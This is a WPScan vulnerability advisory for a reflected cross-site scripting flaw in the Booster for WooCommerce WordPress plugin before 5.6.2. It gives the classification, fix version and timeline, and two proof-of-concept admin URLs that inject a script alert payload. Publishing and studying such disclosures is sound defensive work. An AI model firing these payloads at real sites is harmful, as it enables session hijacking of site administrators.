WordPress Plugin Vulnerabilities

Booster for WooCommerce < 5.6.2 - Reflected Cross-Site Scripting

Description

The plugin does not escape some generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting

Proof of Concept

v < 5.6.0 https://example.com/wp-admin/admin.php?page=wcj-tools&tab=custom_roles&a"><script>alert(/XSS/)</script>

v < 5.6.2 (except 5.5.9):

With the Orders module enabled, and "Admin Order Navigation" settings enabled: https://example.com/wp-admin/post.php?post=796&action=edit&a"><script>alert(/XSS/)</script>

Affects Plugins

Plugin icon
woocommerce-jetpack
Fixed in 5.6.2

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
f1790084-8c34-423f-90aa-773cb0f1c48d

Timeline

Publicly Published
2022-07-04 (about 1 years ago)
Added
2022-07-04 (about 1 years ago)
Last Updated
2022-07-27 (about 1 years ago)

Other

Published
Title
Published
2015-04-20
Title
Gravity Forms <= 1.9.6 - Cross-Site Scripting (XSS)
Published
2021-04-13
Title
HT Mega - Absolute Addons for Elementor Page Builder < 1.5.7 - Contributor+ Stored XSS
Published
2023-02-21
Title
real.Kit < 5.1.1 - Contributor+ Stored XSS
Published
2014-08-01
Title
PictureFactory - Unspecified XSS
Published
2024-01-15
Title
CformsII < 15.0.7 - Unauthenticated Stored XSS